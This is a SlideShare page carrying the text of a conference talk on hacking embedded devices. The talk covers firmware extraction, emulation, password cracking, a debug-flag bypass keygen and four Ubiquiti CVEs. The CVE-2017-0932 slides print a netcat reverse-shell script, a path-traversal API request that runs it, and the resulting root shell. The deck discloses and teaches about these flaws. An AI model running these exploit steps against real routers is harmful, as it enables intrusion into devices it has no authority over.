Uploaded byssuserfcf43f
PPTX, PDF107 views

hacking-embedded-devices.pptx

The document summarizes Maycon Vitali's presentation on hacking embedded devices. It includes an agenda covering extracting firmware from devices using tools like BusPirate and flashrom, decompressing firmware to view file systems and binaries, emulating binaries using QEMU, reverse engineering code to find vulnerabilities, and details four vulnerabilities discovered in Ubiquiti networking devices designated as CVEs. The presentation aims to demonstrate common weaknesses in embedded device security and how tools can be used to analyze and hack these ubiquitous connected systems.

Embed presentation

Download to read offline
Internet of Sh*t Hacking Embedded Devices Maycon Vitali maycon at hacknroll dot com
Agenda • Who Am I? • General Overview • Toolset • Firmware Extraction • Serial Interface • Reverse Engineering • UBNT Findings – CVE-2017-093[2-5] • Conclusion
Who am I? • Senior Security Consultant @ SpiderLabs • Security Researcher @ Hack N’ Roll • Main duties: • Web Application Pentest • Network Pentest • Mobile Application Pentest (SL-TT) • ATM Pentest • Embedded Devices Pentest
General Overview
General Overview • Used by 64% of organizations • Present on almost 100% of all residents. • [g]old architecture designing. • Operating System with almost no protection (80s like exploitation) • Security isn’t a “MUST DO” to developers. • Common weaknesses.
Toolset
Main Toolset • Reversing • radare2 • Firmware Extraction (SPI) • SOIC Clip • BusPirate / Raspberry Pi • flashrom • Debugging • qemu-user • gdb (target arch) • gcc-multilib • gef
Firmware Extraction
Vendor Download Page
Network Sniffing Firmware Upgrade
SPI Extraction
SPI Extraction
Target ZHAL> ATSH FW Version : V1.13(WUK.0)b6 External Version : BR_SO_V1.13(WUK.0)b6 Bootbase Version : V1.10 | 01/18/2016 Vendor Name : MitraStar Technology Corp. Product Model : DSL-100HN-T1-NV Serial Number : ACC6629493C0 First MAC Address : ACC6629493C0 Last MAC Address : ACC6629493C3 MAC Address Quantity : 04 Default Country Code : D0 Boot Module Debug Flag : 00 Kernel Checksum : d831a525 RootFS Checksum : a4b2b045 RomFile Checksum : daa5645d Main Feature Bits : 00
SPI Pinout • CS – Chip Select • SI – Serial In • SO – Serial Out • SCLK - Clock • RESET# - Reset (not used) • VCC – Power-supply • GND - Ground MX25L12835F Datasheet
BusPirate
Using flashrom [maycon@DayOfDevil ~]$ flashrom > -p buspirate_spi:dev=/dev/buspirate,spispeed=1M > -c "MX25L12835F/MX25L12845E/MX25L12865E" > -r flash.dump flashrom v0.9.9-r1955 on Linux 4.14.7-1-ARCH (x86_64) flashrom is free software, get the code at https://flashrom.org Calibrating delay loop... OK. Found Macronix flash chip "MX25L12835F/MX25L12845E/MX25L12865E" (16384 kB, SPI) on buspirate_spi Reading flash... done
Using binwalk • -e means [e]xtrac files [maycon@DayOfDevil ~]$ binwalk –e flash.dump DECIMAL HEXADECIMAL DESCRIPTION -------------------------------------------------------------------------------- 26112 0x6600 LZMA compressed data, properties: 0x5D, ... 69600 0x10FE0 LZMA compressed data, properties: 0x5D, ... 197120 0x30200 LZMA compressed data, properties: 0x5D, ... 1372293 0x14F085 Squashfs filesystem, little endian, version 4.0, ... 8389120 0x800200 LZMA compressed data, properties: 0x5D, ... 9564293 0x91F085 Squashfs filesystem, little endian, version 4.0, ...
Binary Emulation [maycon@DayOfDevil squashfs-root]$ file bin/ls bin/ls: symbolic link to busybox [maycon@DayOfDevil squashfs-root]$ file bin/busybox bin/busybox: ELF 32-bit MSB executable, MIPS, MIPS32 rel2 version 1 (SYSV), dynamically linked, interpreter /lib/ld-uClibc.so.0, stripped [maycon@DayOfDevil squashfs-root]$ file bin/ls bin/ls: symbolic link to busybox [maycon@DayOfDevil squashfs-root]$ file bin/busybox bin/busybox: ELF 32-bit MSB executable, MIPS, MIPS32 rel2 version 1 (SYSV), dynamically linked, interpreter /lib/ld-uClibc.so.0, stripped [maycon@DayOfDevil squashfs-root]$ cp $(which qemu-mips-static) . [maycon@DayOfDevil squashfs-root]$ ls -la qemu-mips-static -rwxr-xr-x 1 maycon users 3289936 Feb 19 03:47 qemu-mips-static [maycon@DayOfDevil squashfs-root]$ sudo chroot . ./qemu-mips-static bin/ls bin etc proc sys usr boaroot lib qemu-mips-static tmp var dev linuxrc sbin userfs
Serial Interface UART
UART Interface
Reverse Engineering
Reverse Engineering # cat > /etc/passwd support:$1$$CoERg7ynjYLsj2j4glJ34.:0:0:root:/:/bin/cmdsh admin:$1$$C1ky1AR55g1vIlMrcvBNM1:0:0:root:/:/bin/sh $ ./john ./_flash.dump.extracted/squashfs-root/usr/etc/passwd Using default input encoding: UTF-8 Loaded 1 password hash (md5crypt, crypt(3) $1$ [MD5 256/256 AVX2 8x3]) Will run 4 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status 1234 (admin) 1g 0:00:00:00 DONE 2/3 (2017-12-21 20:46) 4.545g/s 24818p/s 24818c/s 24818C/s 123456..larry Use the "--show" option to display all of the cracked passwords reliably Session completed
Reverse Engineering
Reverse Engineering • puts(“Password incorrect !”);
Reverse Engineering • puts(“Password incorrect !”); • system(…)
Reverse Engineering • puts(“Password incorrect !”); • system(…) • strcmp(…, “18vudl1b.4”);
Bootloader ATEN Keygen
Reversing the ATEN algorithm [maycon@DayOfDevil Vivo]$ ./aten_bypass C6629493C0 To enable DebugFlag: ZHAL> ATEN 1,10F0A563 To disable DebugFlag: ZHAL> ATEN 0,10F0A563
UBNT Findings
CVE-2017-0935 – Privilege Escalation with Session Hijacking operator@ubnt:~$ df -h Filesystem Size Used Available Use% Mounted on ubi0_0 214.9M 144.4M 65.8M 69% /root.dev aufs 214.9M 144.4M 65.8M 69% / devtmpfs 124.4M 0 124.4M 0% /dev tmpfs 124.5M 56.0K 124.4M 0% /run tmpfs 124.5M 56.0K 124.4M 0% /run tmpfs 124.5M 52.0K 124.4M 0% /var/log tmpfs 124.5M 0 124.5M 0% /tmp none 124.5M 112.0K 124.4M 0% /opt/vyatta/config operator@ubnt:~$
CVE-2017-0935 – Privilege Escalation with Session Hijacking operator@ubnt:~$ df -h Filesystem Size Used Available Use% Mounted on ubi0_0 214.9M 144.4M 65.8M 69% /root.dev aufs 214.9M 144.4M 65.8M 69% / devtmpfs 124.4M 0 124.4M 0% /dev tmpfs 124.5M 60.0K 124.4M 0% /run tmpfs 124.5M 60.0K 124.4M 0% /run tmpfs 124.5M 52.0K 124.4M 0% /var/log tmpfs 124.5M 0 124.5M 0% /tmp none 124.5M 112.0K 124.4M 0% /opt/vyatta/config unionfs 124.5M 0 124.5M 0% /opt/vyatta/config/tmp/new_config_g73ik18gms70ciap15in0mttpt0vk81b operator@ubnt:~$
CVE-2017-0934 – Privilege Escalation with Session Hijacking total 0 drwxrwxrwt 4 root root 300 Jan 1 00:07 . drwxr-xr-x 31 root root 760 Jan 1 00:00 .. srwxr-x--- 1 root root 0 Jan 1 00:00 .imi_line srw-rw---- 1 root root 0 Jan 1 00:00 .imi_show srw-rw---- 1 root root 0 Jan 1 00:00 .nsm_show srwxr-x--- 1 root root 0 Jan 1 00:00 .nsmserv srwxr-x--- 1 root root 0 Jan 1 00:00 .rib_serv srw-rw---- 1 root root 0 Jan 1 00:00 .rib_show drwxrwxr-x 2 root vyattacf 60 Jan 1 00:07 changes_only_9ckaihkfskhjt4q7t7d52c87tfvnbioi drwxr-x--- 2 root root 40 Jan 1 00:00 ifp srwxrwx--- 1 root vyattacf 0 Jan 1 00:00 ubnt.socket.cfgd srwxrwx--- 1 root www-data 0 Jan 1 00:00 ubnt.socket.cli srw-rw---- 1 root users 0 Jan 1 00:00 ubnt.socket.platd srwxrwx--- 1 root www-data 0 Jan 1 00:00 ubnt.socket.statsd srwxrwx--- 1 root www-data 0 Jan 1 00:00 ubnt.socket.sysd
CVE-2017-0933 – CSRF Bypassing “Referer:” Whitelisting Protection $ ls -la fake_www/ total 16 drwxr-xr-x 2 hnrteam users 4096 jun 15 02:08 . drwxr-xr-x 7 hnrteam users 4096 jun 15 02:03 .. -rw-r--r-- 1 hnrteam users 3847 jun 15 02:05 index.html -rw-r--r-- 1 hnrteam users 232 jun 15 02:03 lighttpd.conf server.document-root = "/home/operator/fake_www" server.port = 3000 mimetype.assign = ( ".html" => "text/html", ) index-file.names = ( "index.html" ) The content of lighttpd.conf file:
CVE-2017-0932 - Privilege Escalation using API->Feature $ cat Backdoor/wizard-run #!/bin/bash /usr/bin/nc 192.168.2.2:1337 -e /bin/bash & POST /api/edge/feature.json HTTP/1.1 Host: 192.168.2.1 Referer: https://192.168.2.1/ Content-Type: application/json X-Requested-With: XMLHttpRequest Content-Length: 90 Cookie: PHPSESSID=i6um09hej0ku2k5ctcp6ib56f1nrqhi7 Connection: close {"data":{"scenario":"../../../../../home/operator/Backdoor","action":"load","input":"id"}}
CVE-2017-0932 - Privilege Escalation using API->Feature $ cat Backdoor/wizard-run #!/bin/bash /usr/bin/nc 192.168.2.2:1337 -e /bin/bash & POST /api/edge/feature.json HTTP/1.1 Host: 192.168.2.1 Referer: https://192.168.2.1/ Content-Type: application/json X-Requested-With: XMLHttpRequest Content-Length: 90 Cookie: PHPSESSID=i6um09hej0ku2k5ctcp6ib56f1nrqhi7 Connection: close {"data":{"scenario":"../../../../../home/operator/Backdoor","action":"load","input":"id"}} $ nc -lvp 1337 Listening on [0.0.0.0] (family 0, port 1337) Connection from 192.168.2.1 44440 received! id uid=0(root) gid=102(vyattacfg) uname -a Linux ubnt 3.10.14-UBNT #1 SMP Sat Apr 22 06:38:07 PDT 2017 mips GNU/Linux
Questions?

More Related Content

PDF
Linux scheduler
byLiran Ben Haim
 
PDF
C programming session8
byKeroles karam khalil
 
PDF
ATELIER TRÊS RIOS
byMEU SONHO MINHA CASA
 
PDF
Q4.11: Introduction to eMMC
byLinaro
 
PPTX
Implementation & Comparison Of Rdma Over Ethernet
byJames Wernicke
 
PPTX
SCSI Protocol
byRakesh T
 
PPTX
Bootloader and bootloading
byArpita Gupta
 
PDF
Hack.LU 2018 ARM IoT Firmware Emulation Workshop
bySaumil Shah
 
Linux scheduler
byLiran Ben Haim
 
C programming session8
byKeroles karam khalil
 
ATELIER TRÊS RIOS
byMEU SONHO MINHA CASA
 
Q4.11: Introduction to eMMC
byLinaro
 
Implementation & Comparison Of Rdma Over Ethernet
byJames Wernicke
 
SCSI Protocol
byRakesh T
 
Bootloader and bootloading
byArpita Gupta
 
Hack.LU 2018 ARM IoT Firmware Emulation Workshop
bySaumil Shah
 

Similar to hacking-embedded-devices.pptx

PDF
Practical IoT Exploitation (DEFCON23 IoTVillage) - Lyon Yang
byLyon Yang
 
PDF
Exploiting Llinux Environment
byEnrico Scapin
 
PPTX
Advanced SOHO Router Exploitation XCON
byLyon Yang
 
PDF
NSC #2 - Challenge Solution
byNoSuchCon
 
PDF
DefCon 2012 - Rooting SOHO Routers
byMichael Smith
 
PDF
Filip palian mateuszkocielski. simplest ownage human observed… routers
byYury Chemerkin
 
PDF
Simplest-Ownage-Human-Observed… - Routers
byLogicaltrust pl
 
PDF
DEF CON 27 - DANIEL ROMERO and MARIO RIVAS - why you should fear your mundane...
byFelipe Prado
 
PPTX
Steelcon 2015 - 0wning the internet of trash
byinfodox
 
PDF
Linux Kernel Exploitation
byScio Security
 
PDF
DEF CON 24 - workshop - Craig Young - brainwashing embedded systems
byFelipe Prado
 
PPTX
BSides Hannover 2015 - Shell on Wheels
byinfodox
 
PDF
[HES2013] Virtually secure, analysis to remote root 0day on an industry leadi...
byHackito Ergo Sum
 
PDF
Ntxissacsc5 red 1 & 2 basic hacking tools ncc group
byNorth Texas Chapter of the ISSA
 
PPTX
The internet of $h1t
byAmit Serper
 
PDF
IoT exploitation: from memory corruption to code execution by Marco Romano
byCodemotion
 
PDF
IoT exploitation: from memory corruption to code execution - Marco Romano - C...
byCodemotion
 
PPT
Attacking Embedded Devices (No Axe Required)
bySecurity Weekly
 
PPTX
UPC router reverse engineering - case study
byDusan Klinec
 
PDF
0day hunting a.k.a. The story of a proper CPE test
byBalazs Bucsay
 
Practical IoT Exploitation (DEFCON23 IoTVillage) - Lyon Yang
byLyon Yang
 
Exploiting Llinux Environment
byEnrico Scapin
 
Advanced SOHO Router Exploitation XCON
byLyon Yang
 
NSC #2 - Challenge Solution
byNoSuchCon
 
DefCon 2012 - Rooting SOHO Routers
byMichael Smith
 
Filip palian mateuszkocielski. simplest ownage human observed… routers
byYury Chemerkin
 
Simplest-Ownage-Human-Observed… - Routers
byLogicaltrust pl
 
DEF CON 27 - DANIEL ROMERO and MARIO RIVAS - why you should fear your mundane...
byFelipe Prado
 
Steelcon 2015 - 0wning the internet of trash
byinfodox
 
Linux Kernel Exploitation
byScio Security
 
DEF CON 24 - workshop - Craig Young - brainwashing embedded systems
byFelipe Prado
 
BSides Hannover 2015 - Shell on Wheels
byinfodox
 
[HES2013] Virtually secure, analysis to remote root 0day on an industry leadi...
byHackito Ergo Sum
 
Ntxissacsc5 red 1 & 2 basic hacking tools ncc group
byNorth Texas Chapter of the ISSA
 
The internet of $h1t
byAmit Serper
 
IoT exploitation: from memory corruption to code execution by Marco Romano
byCodemotion
 
IoT exploitation: from memory corruption to code execution - Marco Romano - C...
byCodemotion
 
Attacking Embedded Devices (No Axe Required)
bySecurity Weekly
 
UPC router reverse engineering - case study
byDusan Klinec
 
0day hunting a.k.a. The story of a proper CPE test
byBalazs Bucsay
 

Recently uploaded

PDF
Digital Twin in IBM for Accelerated Discovery of Climate & Sustainability, K...
byMichiaki Tatsubori
 
PPTX
The Transformative Technology in Contemporary Businesses
bygreyaudrina
 
PPTX
Introducing VisualSim 2610 The Next Leap in System Level Modeling
byDeepak Shankar
 
PDF
shayk.online - Anonymous chat with Sinatra and WebSockets
byEleanor McHugh
 
PDF
final~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~.pdf
byomarbishtawi04
 
PPTX
Workflow and decision Automation with Flowable
bychakib ch
 
PDF
apidays New York 2025 | AI in Application Security
byapidays
 
PDF
final.pdf
byomarbishtawi04
 
PPTX
apidays Paris 2025 | Building Agentic Workflows
byapidays
 
PDF
Agent to agent service discovery using HashiCorp Consul and Vault
byBram Vogelaar
 
PPTX
Automation Without Apprentices: How AI Challenges the Open Source Way
byIcinga
 
PDF
Odoo Implementation Checklist: A Strategic ERP Blueprint for Business-Ready D...
byBANIBRO IT SOLUTION
 
PDF
Escape from the Forbidden Zone: Smuggling green and inclusive tech past the g...
byBookNet Canada
 
PDF
Explaining the flow of purpose-specific BOM
byakipii ogaoga
 
PDF
apidays Paris 2025 | Zero Trust By Design
byapidays
 
PPTX
Celonis Optimizing your future with process
bydevjeremyappleyard
 
PDF
Oracle Cloud Infrastructure 2025 Architect Professional (1Z0-1127-25) Master ...
byExamCert App
 
PDF
Transcript: Escape from the Forbidden Zone: Smuggling green and inclusive tec...
byBookNet Canada
 
PPTX
GenerationAI Paris 2025 | AI in Tech: Beyond Expectations, Into Execution
byapidays
 
PDF
Explaining specific examples of purpose-specific BOM
byakipii ogaoga
 
Digital Twin in IBM for Accelerated Discovery of Climate & Sustainability, K...
byMichiaki Tatsubori
 
The Transformative Technology in Contemporary Businesses
bygreyaudrina
 
Introducing VisualSim 2610 The Next Leap in System Level Modeling
byDeepak Shankar
 
shayk.online - Anonymous chat with Sinatra and WebSockets
byEleanor McHugh
 
final~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~.pdf
byomarbishtawi04
 
Workflow and decision Automation with Flowable
bychakib ch
 
apidays New York 2025 | AI in Application Security
byapidays
 
final.pdf
byomarbishtawi04
 
apidays Paris 2025 | Building Agentic Workflows
byapidays
 
Agent to agent service discovery using HashiCorp Consul and Vault
byBram Vogelaar
 
Automation Without Apprentices: How AI Challenges the Open Source Way
byIcinga
 
Odoo Implementation Checklist: A Strategic ERP Blueprint for Business-Ready D...
byBANIBRO IT SOLUTION
 
Escape from the Forbidden Zone: Smuggling green and inclusive tech past the g...
byBookNet Canada
 
Explaining the flow of purpose-specific BOM
byakipii ogaoga
 
apidays Paris 2025 | Zero Trust By Design
byapidays
 
Celonis Optimizing your future with process
bydevjeremyappleyard
 
Oracle Cloud Infrastructure 2025 Architect Professional (1Z0-1127-25) Master ...
byExamCert App
 
Transcript: Escape from the Forbidden Zone: Smuggling green and inclusive tec...
byBookNet Canada
 
GenerationAI Paris 2025 | AI in Tech: Beyond Expectations, Into Execution
byapidays
 
Explaining specific examples of purpose-specific BOM
byakipii ogaoga
 

hacking-embedded-devices.pptx

  • 1.
    Internet of Sh*t HackingEmbedded Devices Maycon Vitali maycon at hacknroll dot com
  • 2.
    Agenda • Who AmI? • General Overview • Toolset • Firmware Extraction • Serial Interface • Reverse Engineering • UBNT Findings – CVE-2017-093[2-5] • Conclusion
  • 3.
    Who am I? •Senior Security Consultant @ SpiderLabs • Security Researcher @ Hack N’ Roll • Main duties: • Web Application Pentest • Network Pentest • Mobile Application Pentest (SL-TT) • ATM Pentest • Embedded Devices Pentest
  • 4.
  • 5.
    General Overview • Usedby 64% of organizations • Present on almost 100% of all residents. • [g]old architecture designing. • Operating System with almost no protection (80s like exploitation) • Security isn’t a “MUST DO” to developers. • Common weaknesses.
  • 6.
  • 7.
    Main Toolset • Reversing •radare2 • Firmware Extraction (SPI) • SOIC Clip • BusPirate / Raspberry Pi • flashrom • Debugging • qemu-user • gdb (target arch) • gcc-multilib • gef
  • 8.
  • 9.
  • 10.
  • 11.
  • 12.
  • 13.
    Target ZHAL> ATSH FW Version: V1.13(WUK.0)b6 External Version : BR_SO_V1.13(WUK.0)b6 Bootbase Version : V1.10 | 01/18/2016 Vendor Name : MitraStar Technology Corp. Product Model : DSL-100HN-T1-NV Serial Number : ACC6629493C0 First MAC Address : ACC6629493C0 Last MAC Address : ACC6629493C3 MAC Address Quantity : 04 Default Country Code : D0 Boot Module Debug Flag : 00 Kernel Checksum : d831a525 RootFS Checksum : a4b2b045 RomFile Checksum : daa5645d Main Feature Bits : 00
  • 14.
    SPI Pinout • CS– Chip Select • SI – Serial In • SO – Serial Out • SCLK - Clock • RESET# - Reset (not used) • VCC – Power-supply • GND - Ground MX25L12835F Datasheet
  • 15.
  • 16.
    Using flashrom [maycon@DayOfDevil ~]$flashrom > -p buspirate_spi:dev=/dev/buspirate,spispeed=1M > -c "MX25L12835F/MX25L12845E/MX25L12865E" > -r flash.dump flashrom v0.9.9-r1955 on Linux 4.14.7-1-ARCH (x86_64) flashrom is free software, get the code at https://flashrom.org Calibrating delay loop... OK. Found Macronix flash chip "MX25L12835F/MX25L12845E/MX25L12865E" (16384 kB, SPI) on buspirate_spi Reading flash... done
  • 17.
    Using binwalk • -emeans [e]xtrac files [maycon@DayOfDevil ~]$ binwalk –e flash.dump DECIMAL HEXADECIMAL DESCRIPTION -------------------------------------------------------------------------------- 26112 0x6600 LZMA compressed data, properties: 0x5D, ... 69600 0x10FE0 LZMA compressed data, properties: 0x5D, ... 197120 0x30200 LZMA compressed data, properties: 0x5D, ... 1372293 0x14F085 Squashfs filesystem, little endian, version 4.0, ... 8389120 0x800200 LZMA compressed data, properties: 0x5D, ... 9564293 0x91F085 Squashfs filesystem, little endian, version 4.0, ...
  • 18.
    Binary Emulation [maycon@DayOfDevil squashfs-root]$file bin/ls bin/ls: symbolic link to busybox [maycon@DayOfDevil squashfs-root]$ file bin/busybox bin/busybox: ELF 32-bit MSB executable, MIPS, MIPS32 rel2 version 1 (SYSV), dynamically linked, interpreter /lib/ld-uClibc.so.0, stripped [maycon@DayOfDevil squashfs-root]$ file bin/ls bin/ls: symbolic link to busybox [maycon@DayOfDevil squashfs-root]$ file bin/busybox bin/busybox: ELF 32-bit MSB executable, MIPS, MIPS32 rel2 version 1 (SYSV), dynamically linked, interpreter /lib/ld-uClibc.so.0, stripped [maycon@DayOfDevil squashfs-root]$ cp $(which qemu-mips-static) . [maycon@DayOfDevil squashfs-root]$ ls -la qemu-mips-static -rwxr-xr-x 1 maycon users 3289936 Feb 19 03:47 qemu-mips-static [maycon@DayOfDevil squashfs-root]$ sudo chroot . ./qemu-mips-static bin/ls bin etc proc sys usr boaroot lib qemu-mips-static tmp var dev linuxrc sbin userfs
  • 19.
  • 20.
  • 23.
  • 24.
    Reverse Engineering # cat> /etc/passwd support:$1$$CoERg7ynjYLsj2j4glJ34.:0:0:root:/:/bin/cmdsh admin:$1$$C1ky1AR55g1vIlMrcvBNM1:0:0:root:/:/bin/sh $ ./john ./_flash.dump.extracted/squashfs-root/usr/etc/passwd Using default input encoding: UTF-8 Loaded 1 password hash (md5crypt, crypt(3) $1$ [MD5 256/256 AVX2 8x3]) Will run 4 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status 1234 (admin) 1g 0:00:00:00 DONE 2/3 (2017-12-21 20:46) 4.545g/s 24818p/s 24818c/s 24818C/s 123456..larry Use the "--show" option to display all of the cracked passwords reliably Session completed
  • 26.
  • 27.
  • 28.
  • 29.
    Reverse Engineering • puts(“Password incorrect!”); • system(…) • strcmp(…, “18vudl1b.4”);
  • 31.
  • 32.
    Reversing the ATENalgorithm [maycon@DayOfDevil Vivo]$ ./aten_bypass C6629493C0 To enable DebugFlag: ZHAL> ATEN 1,10F0A563 To disable DebugFlag: ZHAL> ATEN 0,10F0A563
  • 34.
  • 35.
    CVE-2017-0935 – PrivilegeEscalation with Session Hijacking operator@ubnt:~$ df -h Filesystem Size Used Available Use% Mounted on ubi0_0 214.9M 144.4M 65.8M 69% /root.dev aufs 214.9M 144.4M 65.8M 69% / devtmpfs 124.4M 0 124.4M 0% /dev tmpfs 124.5M 56.0K 124.4M 0% /run tmpfs 124.5M 56.0K 124.4M 0% /run tmpfs 124.5M 52.0K 124.4M 0% /var/log tmpfs 124.5M 0 124.5M 0% /tmp none 124.5M 112.0K 124.4M 0% /opt/vyatta/config operator@ubnt:~$
  • 36.
    CVE-2017-0935 – PrivilegeEscalation with Session Hijacking operator@ubnt:~$ df -h Filesystem Size Used Available Use% Mounted on ubi0_0 214.9M 144.4M 65.8M 69% /root.dev aufs 214.9M 144.4M 65.8M 69% / devtmpfs 124.4M 0 124.4M 0% /dev tmpfs 124.5M 60.0K 124.4M 0% /run tmpfs 124.5M 60.0K 124.4M 0% /run tmpfs 124.5M 52.0K 124.4M 0% /var/log tmpfs 124.5M 0 124.5M 0% /tmp none 124.5M 112.0K 124.4M 0% /opt/vyatta/config unionfs 124.5M 0 124.5M 0% /opt/vyatta/config/tmp/new_config_g73ik18gms70ciap15in0mttpt0vk81b operator@ubnt:~$
  • 37.
    CVE-2017-0934 – PrivilegeEscalation with Session Hijacking total 0 drwxrwxrwt 4 root root 300 Jan 1 00:07 . drwxr-xr-x 31 root root 760 Jan 1 00:00 .. srwxr-x--- 1 root root 0 Jan 1 00:00 .imi_line srw-rw---- 1 root root 0 Jan 1 00:00 .imi_show srw-rw---- 1 root root 0 Jan 1 00:00 .nsm_show srwxr-x--- 1 root root 0 Jan 1 00:00 .nsmserv srwxr-x--- 1 root root 0 Jan 1 00:00 .rib_serv srw-rw---- 1 root root 0 Jan 1 00:00 .rib_show drwxrwxr-x 2 root vyattacf 60 Jan 1 00:07 changes_only_9ckaihkfskhjt4q7t7d52c87tfvnbioi drwxr-x--- 2 root root 40 Jan 1 00:00 ifp srwxrwx--- 1 root vyattacf 0 Jan 1 00:00 ubnt.socket.cfgd srwxrwx--- 1 root www-data 0 Jan 1 00:00 ubnt.socket.cli srw-rw---- 1 root users 0 Jan 1 00:00 ubnt.socket.platd srwxrwx--- 1 root www-data 0 Jan 1 00:00 ubnt.socket.statsd srwxrwx--- 1 root www-data 0 Jan 1 00:00 ubnt.socket.sysd
  • 38.
    CVE-2017-0933 – CSRFBypassing “Referer:” Whitelisting Protection $ ls -la fake_www/ total 16 drwxr-xr-x 2 hnrteam users 4096 jun 15 02:08 . drwxr-xr-x 7 hnrteam users 4096 jun 15 02:03 .. -rw-r--r-- 1 hnrteam users 3847 jun 15 02:05 index.html -rw-r--r-- 1 hnrteam users 232 jun 15 02:03 lighttpd.conf server.document-root = "/home/operator/fake_www" server.port = 3000 mimetype.assign = ( ".html" => "text/html", ) index-file.names = ( "index.html" ) The content of lighttpd.conf file:
  • 39.
    CVE-2017-0932 - PrivilegeEscalation using API->Feature $ cat Backdoor/wizard-run #!/bin/bash /usr/bin/nc 192.168.2.2:1337 -e /bin/bash & POST /api/edge/feature.json HTTP/1.1 Host: 192.168.2.1 Referer: https://192.168.2.1/ Content-Type: application/json X-Requested-With: XMLHttpRequest Content-Length: 90 Cookie: PHPSESSID=i6um09hej0ku2k5ctcp6ib56f1nrqhi7 Connection: close {"data":{"scenario":"../../../../../home/operator/Backdoor","action":"load","input":"id"}}
  • 40.
    CVE-2017-0932 - PrivilegeEscalation using API->Feature $ cat Backdoor/wizard-run #!/bin/bash /usr/bin/nc 192.168.2.2:1337 -e /bin/bash & POST /api/edge/feature.json HTTP/1.1 Host: 192.168.2.1 Referer: https://192.168.2.1/ Content-Type: application/json X-Requested-With: XMLHttpRequest Content-Length: 90 Cookie: PHPSESSID=i6um09hej0ku2k5ctcp6ib56f1nrqhi7 Connection: close {"data":{"scenario":"../../../../../home/operator/Backdoor","action":"load","input":"id"}} $ nc -lvp 1337 Listening on [0.0.0.0] (family 0, port 1337) Connection from 192.168.2.1 44440 received! id uid=0(root) gid=102(vyattacfg) uname -a Linux ubnt 3.10.14-UBNT #1 SMP Sat Apr 22 06:38:07 PDT 2017 mips GNU/Linux
  • 41.